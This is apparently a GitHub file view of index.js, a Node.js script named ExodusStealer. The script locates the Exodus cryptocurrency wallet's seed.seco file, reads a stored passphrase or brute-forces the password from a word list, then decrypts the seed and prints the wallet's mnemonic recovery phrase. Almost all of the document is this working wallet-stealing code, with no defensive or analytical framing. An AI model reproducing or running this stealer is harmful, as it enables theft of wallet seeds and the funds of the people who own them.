-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathindex.js
95 lines (77 loc) · 3.01 KB
/
index.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
const seco = require("seco-file");
const zlib = require("zlib");
const bs = require("bitcoin-seed");
const fs = require("fs");
function shrink(e) {
const t = e.readUInt32BE(0);
return e.slice(4, t + 4);
}
function decrypt(secoPath, passwords) {
let decrypted = seco.decryptData(fs.readFileSync(secoPath), passwords).data;
let shrinked = shrink(decrypted);
let gunzipped = zlib.gunzipSync(shrinked);
let mnemonic = bs.fromBuffer(gunzipped).mnemonicString;
return mnemonic;
}
const path = require('path');
const exodusInfo = locateExodus();
function locateExodus() {
const ExodusPath = path.join(process.env.appdata, "exodus", "exodus.wallet")
const seedPath = path.join(ExodusPath, "seed.seco")
if (fs.existsSync(seedPath)) {
return {
"exodus": true,
"path": seedPath,
"passwordRequired": !fs.existsSync(path.join(ExodusPath, "passphrase.json"))
}
}
return {
"exodus": false
}
}
const ExodusPath = path.join(process.env.appdata, "exodus", "exodus.wallet")
function ExodusStealer(passwords) {
if (exodusInfo.exodus) {
if (!exodusInfo.passwordRequired) {
const passphrase = JSON.parse(fs.readFileSync(path.join(ExodusPath, "passphrase.json")).toString()).passphrase
const mnemonic = decrypt(exodusInfo.path, passphrase)
return { exodusInfo, "mnemonic": mnemonic };
}
var bforced = BruteForcePassword(passwords)
if (bforced.success == true) {
var password = bforced.password
const mnemonic = decrypt(exodusInfo.path, password)
return { exodusInfo, "mnemonic": mnemonic, "time": bforced.time, "password": bforced.password };
} else {
return { "error": "Couldn't bruteforce the password.", "success": false }
}
}
else {
return { "exodus": false };
}
}
function BruteForcePassword(passwords) {
if (exodusInfo.exodus && exodusInfo.passwordRequired) {
var start = process.hrtime()
let tried_passwords = 0
var passwords_l = [...new Set(passwords)];
var path = fs.readFileSync(exodusInfo.path);
for (const p of passwords_l) {
if (p.length > 4) {
try {
seco.decryptData(fs.readFileSync(ExodusPath + "\\seed.seco"), p)
var end = process.hrtime(start)
return {
"success": true, "password": p, "time": end[0] + " seconds and " + end[1] / 1000000 + " milliseconds.", "tried_passwords": tried_passwords
};
}
catch {
tried_passwords++;
}
}
}
return { "success": false, "error": "Password isn't part of the list", "tried_password": tried_passwords }
}
}
var t = ExodusStealer(fs.readFileSync('list.txt').toString().split('\r\n'))
console.log(t)